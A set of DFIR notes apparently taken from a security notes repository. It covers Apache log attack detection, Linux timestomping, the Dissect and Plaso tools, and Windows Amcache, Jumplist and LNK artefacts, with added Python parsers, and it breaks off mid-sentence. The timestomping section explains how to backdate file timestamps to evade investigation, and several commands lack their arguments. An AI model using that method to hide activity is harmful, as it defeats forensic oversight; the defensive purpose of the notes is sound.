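As an added example that is not part of the original notes, the following Python parses both formats from the table above: `-` fields become `None`, the `%r` request line is split into method, path and protocol, and lines matching neither format are returned separately rather than silently dropped. The sample input reuses the table's two example lines plus one constructed malformed line.

```python
import re
from datetime import datetime

# One pattern covers the CLF fields; the optional trailing group captures the two
# extra fields of the NCSA Combined format (Referer and User-agent).
LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?\s*$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"  # e.g. 10/Oct/2000:13:55:36 -0700


def _field(value):
    """A '-' means the information is not present; map it (and a missing group) to None."""
    return None if value in (None, "-") else value


def parse_line(line):
    """Parse one CLF or Combined line into a dict, or return None if it matches neither."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    parts = d["request"].split(" ")
    # "%r" is normally "METHOD PATH PROTOCOL"; keep a malformed request line whole as the path.
    method, path, protocol = parts if len(parts) == 3 else (None, d["request"] or None, None)
    return {
        "format": "combined" if d["referer"] is not None else "clf",
        "host": d["host"],
        "ident": _field(d["ident"]),
        "user": _field(d["user"]),
        "time": datetime.strptime(d["time"], TIME_FMT),
        "method": method,
        "path": path,
        "protocol": protocol,
        "status": int(d["status"]),
        "size": None if d["size"] == "-" else int(d["size"]),
        "referer": _field(d["referer"]),
        "agent": _field(d["agent"]),
    }


def parse_log(text):
    """Parse a whole log; returns (records, unparsed_lines) so that rejects are not lost."""
    records, rejected = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            rejected.append(line)
        else:
            records.append(rec)
    return records, rejected


# Sample input: the two example lines from the table above plus one constructed malformed line.
SAMPLE_LOG = """127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326
127.0.0.1 - frank [10/Oct/2022:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 "http://www.example.com/start.html" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
this line is not an access log entry
"""

if __name__ == "__main__":
    records, rejected = parse_log(SAMPLE_LOG)
    for r in records:
        print(r["format"], r["host"], r["user"], r["time"].isoformat(), r["method"], r["path"], r["status"], r["size"])
    print(f"{len(rejected)} unparsed line(s)")
```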

### Automated attack patterns detection

###### Apache access logs

The `Scalp!` Python script can be used in combination with the `PHPIDS` project's regular expression filters to automatically detect common attacks (`SQL` injection, `cross-site scripting (XSS)`, local and remote file inclusion, etc.). The `PHPIDS` project's `default_filter.xml` defines 78 optimized and tested regexes.

`Scalp!` parses the specified `Apache` log files and leverages the `PHPIDS` project's regular expressions to detect the matching attack patterns.

```
# nanopony GitHub repository
--exhaustive: Will not stop at the first type of attack detected
--tough: Will attempt to decode potential attack vectors. Increases the analysis time but can greatly reduce false-positives

python3 scalp.py --exhaustive --tough -l -f -o
```

The analysis of 10 000 lines of logs takes around 90 seconds (on an `i7-4700MQ` CPU), and while `Scalp!` implements a time frame filter, the functionality does not seem to work.

For larger `Apache` log files, the files can be split in multiple parts and the analysis parallelized, up to the maximum processing power, using the Linux `xargs` utility. Doing so, the analysis time of 100 000 lines of logs is reduced to around 200 seconds (on an `i7-4700MQ` CPU).

```
FILE_NAME=
OUTPUT_FOLDER=
SCALP_PATH=
FILTER_PATH=
NUMBER_LINES=10000

split -d -l $NUMBER_LINES $FILE_NAME "$PWD/$OUTPUT_FOLDER/$FILE_NAME"
find "$PWD/$OUTPUT_FOLDER" -maxdepth 1 -type f | xargs -P0 -I {} python3 $SCALP_PATH --exhaustive --tough -l {} -f $FILTER_PATH -o "$PWD/$OUTPUT_FOLDER"
```

--------------------------------------------------------------------------------

### References

https://httpd.apache.org/docs/current/logs.html

--------------------------------------------------------------------------------
/DFIR/Linux/README.md:
--------------------------------------------------------------------------------

# DFIR - Linux

--------------------------------------------------------------------------------
/DFIR/Linux/TTPs_Analysis/README.md:
--------------------------------------------------------------------------------

https://raw.githubusercontent.com/Qazeer/InfoSec-Notes/9340c61f285ec85e329b3bafdad724e0aa69e8f0/DFIR/Linux/TTPs_Analysis/README.md

--------------------------------------------------------------------------------
/DFIR/Linux/TTPs_Analysis/Timestomping.md:
--------------------------------------------------------------------------------

# DFIR - Linux - Timestomping

### Overview

Timestomping is the action of modifying the timestamps of a file (on Linux systems, generally on an `ext3` or `ext4` partition). It can notably be used to evade digital forensic investigation by making malicious files look legitimate or fall outside the presupposed attack timeframe.

This technique is identified by [MITRE ATT&CK T1070.006](https://attack.mitre.org/techniques/T1070/006/).

###### Linux ext3 / ext4 partitions timestamps

On Linux `ext3` partitions, each file (and folder) is associated with three
timestamps:
- `atime`, for `access time`, which corresponds to the last access to the
  file (but is in practice not reliably updated, as most systems mount with
  `relatime` or `noatime`).
- `mtime`, for `modification time`, which corresponds to the last
  modification of the file content or, for a folder, the last addition /
  renaming / deletion of an entry in the folder.
- `ctime`, for `change time`, which corresponds to the last modification of
  the file or folder's metadata (name, owner, permissions, etc.). If the
  content of a file / folder is modified, the `ctime` timestamp is also
  updated (in addition to the `mtime` timestamp).

The `crtime`, for `creation time`, was introduced on Linux `ext4` partitions
(it is stored in the extended inode fields, which require the 256-byte inodes
that `ext4` uses by default). This timestamp records the creation / birth time
of a file or folder.

###### Timestomping on Linux systems

Modification of file timestamps is generally conducted on Linux operating
systems using the `touch` utility. This utility can be used to set the `mtime`
and `atime` timestamps of a file or folder to the current date, to arbitrary
values (`-d` / `-t`), or to the timestamps of a reference file (`-r`).

`touch` cannot set the `ctime` timestamp of a file or folder to an arbitrary
value: any change made through `touch` sets `ctime` to the current system
time. It is thus possible to backdate the `ctime` timestamp of a file or
folder by changing the system time, using `touch` on the given file or
folder, and resetting the system time to its previous value (a clock change
that may itself be logged by the system).

**The `crtime` timestamp of a file or folder can however not be updated by
`touch`.** Modifying a file or folder's `crtime` timestamp would require
writing to the underlying disk structures (using `debugfs` for example),
which cannot safely be done while the filesystem is mounted.
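The timestamp semantics above translate directly into a check that can be run on the output of `debugfs -R 'stat <inode>'`. The following parser and heuristics are an added example written for this note (not part of the original, and not `debugfs` or `e2fsprogs` code); the `debugfs` output it consumes is constructed for the example, describing a file created in 2020 whose `atime` / `mtime` were set back to 2017 with `touch -d`. The epoch-bit and nanosecond decoding of the `extra` field follows the ext4 on-disk layout.

```python
import re

# Matches the timestamp lines printed by `debugfs -R 'stat <inode>'`, e.g.
#   " mtime: 0x5f3e6a9e:8c4fd2a0 -- Thu Aug 20 12:20:46 2020"
# The value after the colon is the ext4 *_extra field (absent on ext3 or on
# 128-byte inodes); the trailing human-readable date is ignored.
TS_RE = re.compile(r"^\s*(crtime|ctime|mtime|atime):\s+0x([0-9a-fA-F]+)(?::([0-9a-fA-F]+))?")


def parse_debugfs_stat(output):
    """Return {name: (seconds, nanoseconds)} for the timestamps found in debugfs stat output."""
    timestamps = {}
    for line in output.splitlines():
        m = TS_RE.match(line)
        if not m:
            continue
        name, secs_hex, extra_hex = m.groups()
        seconds = int(secs_hex, 16)
        if seconds >= 1 << 31:          # the base field is a signed 32-bit value
            seconds -= 1 << 32
        nanoseconds = 0
        if extra_hex is not None:
            extra = int(extra_hex, 16)
            # ext4 layout of the 32-bit extra field: bits 0-1 extend the epoch
            # (dates beyond 2038), bits 2-31 hold the nanoseconds.
            seconds += (extra & 0x3) << 32
            nanoseconds = extra >> 2
        timestamps[name] = (seconds, nanoseconds)
    return timestamps


def timestomp_indicators(timestamps):
    """Heuristic checks on one inode; an empty list means nothing suspicious was found."""
    findings = []
    crtime = timestamps.get("crtime")
    if crtime is None:
        return ["no crtime (ext3 or 128-byte inodes): birth-time comparison impossible"]
    # Nothing can legitimately happen to a file before it exists.
    for name in ("mtime", "ctime", "atime"):
        if name in timestamps and timestamps[name] < crtime:
            findings.append(f"{name} precedes crtime")
    # touch -d / -t with a whole-second argument stores zero nanoseconds, while
    # kernel-set timestamps on 256-byte inodes carry nanosecond precision.
    for name in ("mtime", "atime"):
        if name in timestamps and timestamps[name][1] == 0 and crtime[1] != 0:
            findings.append(f"{name} has zero nanoseconds while crtime does not")
    return findings


# Constructed debugfs output (not from a real system): created 2020-08-20, then
# `touch -d "2017-11-06 06:24:00"` applied, which also bumped ctime to "now".
SAMPLE_STAT = """Inode: 131073   Type: regular    Mode:  0644   Flags: 0x80000
Generation: 2541726012    Version: 0x00000000:00000001
User:     0   Group:     0   Project:     0   Size: 1337
File ACL: 0
Links: 1   Blockcount: 8
Fragment:  Address: 0    Number: 0    Size: 0
 ctime: 0x5f3e6b0a:1c9a7d84 -- Thu Aug 20 12:22:34 2020
 atime: 0x5a000000:00000000 -- Mon Nov  6 06:24:00 2017
 mtime: 0x5a000000:00000000 -- Mon Nov  6 06:24:00 2017
crtime: 0x5f3e6a9e:8c4fd2a0 -- Thu Aug 20 12:20:46 2020
Size of extra inode fields: 32
EXTENTS:
(0):34816
"""

if __name__ == "__main__":
    ts = parse_debugfs_stat(SAMPLE_STAT)
    for name, (sec, nsec) in ts.items():
        print(f"{name:>6}: {sec}.{nsec:09d}")
    for finding in timestomp_indicators(ts):
        print("suspicious:", finding)
```

The zero-nanosecond heuristic is only an indicator: files restored from archives or copied with `cp -p` from a filesystem without sub-second timestamps also carry whole-second values, so it should be weighed against the `mtime` / `ctime` before `crtime` check, which has no benign explanation other than a clock change.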

Files or folders with `mtime` or `ctime` timestamps preceding their birth time
(`crtime` timestamp) can thus be indicative of timestomping on `ext4`
partitions.

### Detection of timestomping on ext4 partitions

On recent systems (`coreutils` 8.31+ on a kernel 4.11+), `stat` reports the
`Birth` timestamp directly through `statx`. Otherwise, the `crtime` can be read
from the inode with `debugfs`:

```bash
# Finds on which device the specified file or folder resides.
df | (read a; read a b; echo "$a")

# Returns the inode number of the specified file or folder.
stat -c %i

# Displays the crtime as well as the ctime, atime, and mtime timestamps of the specified inode.
# Note that the <> surrounding the inode number are mandatory.
debugfs -R 'stat <>'
```
--------------------------------------------------------------------------------
/DFIR/Tools/Dissect.md:
--------------------------------------------------------------------------------
# DFIR - Tools - Dissect

### Overview

[`Dissect`](https://github.com/fox-it/dissect) is a digital forensics &
incident response Python toolset that allows access to and parsing of forensic
artefacts from various disk and file formats.

###### Dissect supported targets

`Dissect` supports the [following targets](https://docs.dissect.tools/en/latest/overview/):

- Raw disk images and evidence containers (`.E01`).

- Virtual disks (`.vmdk`, `.vhdx`, etc.).

- Virtual machine descriptor files (`.vmx`, `.vmcx`, etc.). By using a VM
  descriptor file, `dissect` will load all the virtual disks associated
  with the VM.

- Local live systems (`\\.\PhysicalDrive0`, `/dev/sda`, etc.).

- `.tar` archives created by `acquire`.

- Directories, such as `KAPE` or `velociraptor` (`KapeTargets`) collection
  outputs.

###### Dissect tools

`Dissect` is composed of the following tools:

- [`acquire`](https://docs.dissect.tools/en/latest/tools/acquire.html): to
  gather forensic artefacts from disk images or the live system.

- [`target-fs`](https://docs.dissect.tools/en/latest/tools/target-fs.html):
  to interact with the filesystem of a target, using a set of familiar Unix
  commands.

- [`target-mount`](https://docs.dissect.tools/en/latest/tools/target-mount.html):
  to mount the filesystem of a target to an arbitrary directory on the
  analysis machine (similar to the `mount` utility).

- [`target-query`](https://docs.dissect.tools/en/latest/tools/target-query.html):
  to parse data and artefacts from the specified target, mostly as `records`
  outputs.

- [`target-reg`](https://docs.dissect.tools/en/latest/tools/target-reg.html):
  to query the registry of Windows targets.

- [`rdump`](https://docs.dissect.tools/en/latest/tools/rdump.html): to
  interact with and manipulate `dissect`'s `records` outputs.

###### Installation

The `dissect` toolset can be installed through `Python3`'s `pip`:

```bash
python3 -m pip install dissect
python3 -m pip install acquire
```

### acquire

`acquire` can be used to extract artefacts either from the local system or the
specified targets, and place the collected artefacts in a `tar` archive (or
output folder).

`acquire` supports three levels of profiles, that specify the artefacts that
will be collected depending on the target operating system: `minimal`,
`default`, and `full`.

```bash
# OUTPUT_TYPE: tar or dir

acquire -p -o [-ot ]
```

### target-fs

`target-fs` can be used to interact with the filesystem of a target, to list or
copy individual or multiple files from the target to the analysis machine.

```bash
target-fs

target-fs cp -o
```

### target-query

`target-query` can be used to parse artefacts from the target, often (but not
always) resulting in `dissect`'s `records` outputs. `target-query`'s `records`
can be converted to `CSV` or `JSON` outputs as well as filtered with `rdump`.

Multiple artefact sources are implemented as `target-query` `functions`. The
implemented functions can be listed using `target-query -l`. The following
notable functions are implemented:

- Windows operating systems: `activitiescache`, `amcache`, `lnk`,
  `evt` / `evtx`, `powershell_history`, `prefetch`, `recyclebin`, `registry`
  (`bam`, `shimcache`, etc.), `shellbags`, `shimcache`, `sru`, `ual`,
  `userassist`, etc.

- Filesystem: `mft`, `usnjrnl`, `walkfs`.

- Linux / Unix operating systems: `bashhistory`, `cronjobs`, `dpkg`, `audit`,
  `btmp`, `lastlog`, `messages`, `services`, `ssh.authorized_keys`,
  `ssh.known_hosts`, `suid`.

- Web browsers: `browser.history` (Chrome, Firefox, Edge, and Internet Explorer
  histories).

- Remote access applications: `remoteaccess.remoteaccess` (AnyDesk and
  TeamViewer logs).

- Yara scans: `yara`.

```bash
# Example: target-query windows_vm.vmdk -f mft
target-query -f

# Retrieves basic information about the target operating system.
target-query -f hostname,domain,version,ips

# Outputs the records as JSON (only for functions that return records).
target-query -s --json -f

# Uses rdump to transform the records outputs to CSV or JSON.
# --multi-timestamp: emits one copy of a record per timestamp it contains, to build a timeline.
target-query [--multi-timestamp] -f | rdump <--csv | --json | --jsonlines> [--fields ]

# Example Linux functions.
target-query --multi-timestamp -f bashhistory,browser.history,capability_binaries,cronjobs,dpkg,audit,btmp,lastlog,messages,wtmp,services,ssh.authorized_keys,ssh.known_hosts,ssh.private_keys,suid
```
--------------------------------------------------------------------------------
/DFIR/Tools/README.md:
--------------------------------------------------------------------------------
# DFIR - Collectors
--------------------------------------------------------------------------------
/DFIR/Tools/plaso.md:
--------------------------------------------------------------------------------
# DFIR - Tools - Plaso

### Overview

[`Plaso`](https://github.com/log2timeline/plaso) is a Python-based engine used
to generate ("super") timelines, based on a number of forensic artefacts.

### Usage

###### Plaso database generation

The first step to generate a timeline through `plaso` is to create a `plaso`
storage file using `log2timeline.py`.

```bash
# Generates a plaso database, parsing all artefacts available.
log2timeline.py --storage-file

# Generates a plaso database through Docker, parsing all artefacts available.
docker run -v : log2timeline/plaso log2timeline --storage-file / /

# Lists the available parsers.
log2timeline.py --parsers list

# Generates a plaso database, using all parsers except the filestat parser (useful for triaged data parsing).
log2timeline.py --parsers '!filestat' --storage-file
```

The number of events parsed and the errors that occurred during parsing can be
reviewed with the `pinfo` script:

```bash
pinfo.py
```

###### Timeline generation

Once a `plaso` database has been generated with `log2timeline`, the `psort`
script can be used to transform the database into a human-readable timeline.
Multiple output formats are supported, including `json`, `csv`, `TLN`, `xlsx`,
an `opensearch` database for ingestion in `Timesketch`, etc.

`psort` uses UTC as its default time zone when outputting events.

```bash
# Lists the supported output formats.
psort.py -o list

# Generates a timeline in the specified format based on the provided Plaso database.
psort.py -o -w
```
--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/Amcache.md:
--------------------------------------------------------------------------------
# DFIR - Windows - Amcache

**Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).**

### Overview

Location: `%systemroot%\AppCompat\Programs\Amcache.hve`

*`Amcache` is a replacement of the `RecentFileCache` (that was linked to DLL
version `6.1.7600`).*

Yields information related to **programs execution**.

Very complex artefact, linked to an application compatibility feature that aims
to maintain support of existing software on new versions of the Windows
operating system (like the `Shimcache` artefact). `ProgramDataUpdater` (a task
associated with the Application Experience Service) uses the registry file
`Amcache.hve` to store data during process creation.
The `Amcache` is a standalone registry hive, with multiple root keys that
contain various types of data.

The `Amcache` behavior depends on the version of the associated libraries, and
not on the version of the operating system. The `Amcache` on an up-to-date
Windows 7 and on a Windows 10 will thus behave the same way.

For a very comprehensive analysis of the `Amcache` artefact, and its evolution
across the different releases of the underlying `DLL`, refer to the
[ANSSI's ANALYSIS OF THE AMCACHE v2 white paper](https://www.ssi.gouv.fr/uploads/2019/01/anssi-coriin_2019-amcache_investigation.pdf).

### Information of interest

The `Amcache.hve` registry hive is split into a number of root keys, with keys
being added, changed, or removed depending on the `Amcache` `DLLs` versions.

The following notable root keys can be of forensic interest:

- `File`, then `InventoryApplicationFile` starting from version
  `10.0.14913.1002` of the `Amcache` libraries (`AmcacheParser` outputs
  `AssociatedFileEntries` and `UnassociatedFileEntries`):

  - Data about programs that were executed and shimmed, that are part of an
    installed application, or that are part of scanned directories (without
    requiring execution of the associated programs).

  - Data available (depending on the `Amcache` libraries version): executable
    full path, program size, **`SHA1` of the first 30MB of the executable**
    in the `FileId` value, binary type (x86 versus x64), the compilation date
    of the program in the `LinkDate` value.

  - Additional data for entries associated with an installed application is
    available in the `InventoryApplication` key. The `ProgramId` value
    from the `InventoryApplicationFile` subkey of a given program matches the
    subkey's name under the `InventoryApplication` key of the associated
    application.
    The `InventoryApplication` key provides metadata about the application:
    name, publisher, install date, etc.

  - For non up-to-date systems still using a `File` key, the last write time
    of an entry key under the `File` key coincides with the execution time of
    an executable that is not associated to an application. For executables
    that are part of an application, the last write time coincides with
    either the application installation time or the first execution if the
    executable needed shimming. For entries under the newer
    `InventoryApplicationFile` key, the last write time of the keys always
    coincides with an execution of the `Microsoft Compatibility Appraiser`
    and is thus no longer a timestamp of execution.

  - `AmcacheParser`'s `AssociatedFileEntries` output references programs
    associated with an application and its `UnassociatedFileEntries` output
    references "loose" programs (that are not associated with an installed
    application).

- `InventoryDeviceContainer` and `InventoryDevicePnp` (`AmcacheParser`
  outputs `DeviceContainers` and `DevicePnp`):

  - Data about devices plugged in on the system.

  - Data available: device type (USB, Bluetooth, media, etc.), device
    friendly name, self-reported description, manufacturer, associated
    driver, etc.

- `InventoryDriverBinary` (`AmcacheParser` output `DriveBinaries`):

  - Data about installed drivers.

  - Data available: driver name, full path, size, associated service name,
    compilation timestamp (`DriverTimestamp`), driver file last write
    timestamp, etc.

- `InventoryDriverPackage` (`AmcacheParser` output `DriverPackages`):

  - Data about driver package files (`INF` files) that contain information
    about the driver.

  - Data available: driver package file name, path, last write timestamp, etc.

- `Programs`, then `InventoryApplication` (`AmcacheParser` output
  `ProgramEntries`):

  - Data about installed programs, as referenced in the `Uninstall` and / or
    a `Run` key of the `SOFTWARE` hive.

  - Data available: application name, executable full path and SHA1,
    publisher, install date, etc.

- `InventoryApplicationShortcut` (`AmcacheParser` output `ShortCuts`):

  - Data about the shortcuts (`LNK` files) that were present at one time (and
    that may still be present or may have been removed) in a subset of
    scanned folders (Start Menu and / or Desktop folders).

  - Data available: full path of the shortcut. The last write timestamp of
    the associated subkey can also be a general indicator of when the
    activity occurred but does not seem to match any `MACB` timestamps of the
    shortcut file.

### Parsing

The PowerShell cmdlet `Get-ForensicAmcache` of the `PowerForensics` suite
can be used to parse the `Amcache.hve` registry hive. The `AmcacheParser`
utility, which supports Windows 10, can be used to parse an exported
`Amcache.hve` registry hive.

```
# Deploys the PowerShell PowerForensics module
Import-Module .\PowerForensics.psd1

# Defaults to C:\Windows\AppCompat\Programs\Amcache.hve
Get-ForensicAmcache | Out-File

# From an exported hive / mounted disk image
Get-ForensicAmcache -HivePath "" | Out-File

AmcacheParser.exe -f "" -i on --csv
```
--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/Jumplist.md:
--------------------------------------------------------------------------------
# DFIR - Windows - Jumplist

**Windows DFIR notes are no longer maintained on InfoSec-Notes.
Updated versions can be found on: [artefacts.help](https://artefacts.help/).**

### Overview

Location:

- `AutomaticDestinations`:

  `%SystemDrive%:\Users\\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\.automaticDestinations-ms`

  Filename example: `590aee7bdd69b59b.automaticDestinations-ms`

- `CustomDestinations`:

  `%SystemDrive%:\Users\\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\.customDestinations-ms`

  Filename example: `fb3b0dbfee58fac8.customDestinations-ms`

Yields information related to **files and folders access**.

Introduced in `Windows 7`, `Jumplists` are linked to a taskbar user
experience-enhancing feature that allows users to "jump" to files, folders
or other elements by right clicking on open applications in the `Windows
taskbar`. The `Windows Explorer`'s `Quick Access` feature also stores entries
in `Jumplists`.

Two forms of `Jumplists` are created:
- automatic entries for recently accessed items, stored in
  `*.automaticDestinations-ms` files.

- custom entries in `*.customDestinations-ms` files for items manually
  "pinned" (by users or the applications themselves) to the
  `Windows taskbar` or to an application's `Jumplist`.

The `AutomaticDestinations` and `CustomDestinations` `JumpLists` of each
application are thus stored in two distinct files, of different formats:
- `AutomaticDestinations` `JumpLists` files are stored as
  `AUTOMATICDESTINATIONS-MS` files, in the `MS OLE Structured Storage` format.
  This file format contains multiple streams, each stream composed of data
  similar to `shortcut files (.LNK)`.

- `CustomDestinations` `JumpLists` are stored as `CUSTOMDESTINATIONS-MS`
  files, also assimilable to a series of `shortcut files`.
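Both the `JumpLists` streams described above and the stand-alone `shortcut files` covered in the next note share the `Shell Link` binary format (MS-SHLLINK): a fixed 76-byte `ShellLinkHeader` carrying the target's size, attributes and `MAC` `FILETIME`s, followed by optional structures, among which the `LinkInfo` block holding the local path, the network path and the volume identification. The parser below is an added example written for this note, not `JLECmd`, `LECmd` or any other project's code; it decodes only the header and `LinkInfo` (the `IDList`, Unicode string blocks and the `TrackerData` block with the NetBIOS name and MAC address are not decoded), and the `.lnk` blob it parses is constructed in `build_sample_lnk` with assumed values, not a file from a real system. Once a numbered stream is extracted from an `AUTOMATICDESTINATIONS-MS` compound file, the same function applies to it.

```python
import struct
from datetime import datetime, timedelta, timezone

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_FMT = "<I16sIIQQQIIIHHII"   # ShellLinkHeader, 76 (0x4C) bytes
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

HAS_LINK_TARGET_ID_LIST = 0x1      # LinkFlags (MS-SHLLINK 2.1.1)
HAS_LINK_INFO = 0x2
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x1                 # LinkInfoFlags (MS-SHLLINK 2.3)
COMMON_NETWORK_RELATIVE_LINK_AND_PATH_SUFFIX = 0x2

DRIVE_TYPES = {0: "unknown", 1: "no root dir", 2: "removable", 3: "fixed",
               4: "remote", 5: "cdrom", 6: "ramdisk"}
FILE_ATTRIBUTES = {0x1: "readonly", 0x2: "hidden", 0x4: "system", 0x10: "directory", 0x20: "archive"}


def filetime_to_datetime(ft):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return (dt - FILETIME_EPOCH) // timedelta(microseconds=1) * 10


def cstring(data, offset):
    """NUL-terminated ANSI string at offset (code page assumed to be cp1252)."""
    return data[offset:data.index(b"\x00", offset)].decode("cp1252")


def parse_lnk(data):
    """Parse the ShellLinkHeader and, when present, the LinkInfo block of a .lnk blob."""
    (header_size, clsid, link_flags, attrs, ctime, atime, wtime, size,
     _icon, _show, _hotkey, _r1, _r2, _r3) = struct.unpack_from(HEADER_FMT, data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link (bad HeaderSize or LinkCLSID)")
    result = {
        "target_size": size,
        "target_attributes": [name for bit, name in FILE_ATTRIBUTES.items() if attrs & bit],
        "target_created": filetime_to_datetime(ctime),
        "target_accessed": filetime_to_datetime(atime),
        "target_modified": filetime_to_datetime(wtime),
        "local_path": None, "network_path": None, "volume": None,
    }
    offset = header_size
    if link_flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList, skipped
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if link_flags & HAS_LINK_INFO:
        (_li_size, _li_hdr_size, li_flags, vol_off, lbp_off,
         cnrl_off, _cps_off) = struct.unpack_from("<7I", data, offset)   # offsets relative to LinkInfo
        if li_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
            vol = offset + vol_off
            _vsize, drive_type, serial, label_off = struct.unpack_from("<4I", data, vol)
            result["volume"] = {"drive_type": DRIVE_TYPES.get(drive_type, str(drive_type)),
                                "serial": f"{serial:08X}",
                                "label": cstring(data, vol + label_off)}
            result["local_path"] = cstring(data, offset + lbp_off)
        if li_flags & COMMON_NETWORK_RELATIVE_LINK_AND_PATH_SUFFIX:
            cnrl = offset + cnrl_off
            _cnrl_size, _cnrl_flags, net_name_off = struct.unpack_from("<3I", data, cnrl)
            result["network_path"] = cstring(data, cnrl + net_name_off)
    return result


def build_sample_lnk():
    """Construct a minimal .lnk blob with assumed values (not a real system's file)."""
    label = b"SYSTEM\x00"
    local_path = b"C:\\Users\\alice\\Documents\\plan.docx\x00"
    volume_id = struct.pack("<4I", 16 + len(label), 3, 0x1234ABCD, 16) + label   # DRIVE_FIXED
    li_hdr_size = 28
    lbp_off = li_hdr_size + len(volume_id)
    body = volume_id + local_path + b"\x00"              # VolumeID, LocalBasePath, empty CommonPathSuffix
    link_info = struct.pack("<7I", li_hdr_size + len(body), li_hdr_size, VOLUME_ID_AND_LOCAL_BASE_PATH,
                            li_hdr_size, lbp_off, 0, lbp_off + len(local_path)) + body
    utc = timezone.utc
    header = struct.pack(HEADER_FMT, 0x4C, LNK_CLSID, HAS_LINK_INFO, 0x20,
                         datetime_to_filetime(datetime(2023, 10, 9, 8, 0, 0, tzinfo=utc)),
                         datetime_to_filetime(datetime(2023, 10, 10, 13, 55, 36, tzinfo=utc)),
                         datetime_to_filetime(datetime(2023, 10, 10, 13, 50, 0, tzinfo=utc)),
                         48213, 0, 1, 0, 0, 0, 0)
    return header + link_info


if __name__ == "__main__":
    for key, value in parse_lnk(build_sample_lnk()).items():
        print(f"{key}: {value}")
```

The header timestamps are the target's `MAC` times as seen at the last update of the shortcut, which is why they are compared against the shortcut file's own `NTFS` timestamps during analysis; a `local_path` / `network_path` pair answers the local-versus-network-share question directly, and a `removable` drive type with its serial number is the usual pivot towards USB device artefacts.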

### Information of interest

`JumpLists` hold information similar in nature to `shortcut files` for each
file referenced in an application's `AutomaticDestinations` /
`CustomDestinations` `JumpLists`:
- the target file's **absolute path, size and attributes** (hidden,
  read-only, etc.).

- the target file's **`Modified, Access, and Created (MAC)` timestamps**,
  updated whenever the file is "jumped" to.

- the **number of times the target file was "jumped" to**.

As `JumpLists` are linked to an application through an `AppId`, the
application that was used to open the files can be deduced if the
application associated to the `AppId` is known. A number of `AppIds` are
documented in
[`EricZimmerman`'s `JumpList` GitHub repository](https://github.com/EricZimmerman/JumpList/blob/master/JumpList/Resources/AppIDs.txt).

Specific applications may define custom `JumpLists` entries that store
information of forensic interest. For example, the `Google Chrome` and
`Microsoft Edge` web browsers store the recently closed tabs in their
respective `CustomDestinations` `JumpLists`.

### Parsing

Eric Zimmerman's `JumpListExplorer.exe` and `JLECmd.exe` tools (`KAPE`'s
`JLECmd` module) can be used to process `JumpLists` files.

```
# Parses the specified JumpLists file.
JLECmd.exe [-q --csv ] -f

# Recursively retrieves and parses the JumpLists files in the specified directory.
JLECmd.exe [-q --csv ] -d \AppData\Roaming\Microsoft\Windows\Recent\ | C:\ | DIRECTORY>
```

--------------------------------------------------------------------------------

### References

https://www.youtube.com/watch?v=wu4-nREmzGM

https://forensicswiki.xyz/page/LNK

https://www.magnetforensics.com/blog/forensic-analysis-of-lnk-files/
--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/LNKFile.md:
--------------------------------------------------------------------------------
# DFIR - Windows - shortcut files (.LNK)

**Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).**

### Overview

Location:

- Automatically created `shortcut files`:

  `%SystemDrive%:\Users\\AppData\Roaming\Microsoft\Windows\Recent\*.lnk`

- Additional likely locations of `shortcut files`:

  - Automatically created for documents opened using `Microsoft Office`
    products:
    `%SystemDrive%:\Users\\AppData\Roaming\Microsoft\Office\Recent\*.lnk`

  - On the users' `Desktop`:
    `%SystemDrive%:\Users\\Desktop`

  - In the `Startup folders`:
    `%SystemDrive%:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp`
    `%SystemDrive%:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup`

Yields information related to **files and folders access**.

`Shortcut files (*.lnk)` are `Windows Shell Items` that reference an
original file, folder, or application. The effect of double-clicking a
`shortcut file` is intended to be the same as double-clicking the application
or file to which it refers. In addition, command line parameters and the folder
in which the target should be opened can be specified in the shortcut. The
`shortcut files` have a magic number of `0x4C` (`4C 00 00 00`, the header
size), followed by the link `CLSID` `00021401-0000-0000-C000-000000000046`.

While `shortcut files` can be created manually, the Windows operating system
also creates `shortcut files` upon numerous user activities, such as the
opening of a non-executable file. For instance, a `shortcut file` is created
under `[...]\AppData\Roaming\Microsoft\Windows\Recent\` whenever a file is
opened from the `Windows Explorer`. `Shortcut files` created in such
circumstances are referenced in the
`NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`
registry keys.

The `shortcut files` format is also used for entries within the
`AutomaticDestinations` and `CustomDestinations` `JumpLists` files (introduced
in `Windows 7`). For more information on the `JumpLists` files, refer to the
`[DFIR] Windows - Artefacts - Jumplist` note.

### Information of interest

As the `shortcut files` are not automatically deleted if the target file is
deleted, they can be a source of historical information.

The `shortcut files` yield the following information of forensic interest:
- the **target file's absolute path, size and attributes** (hidden,
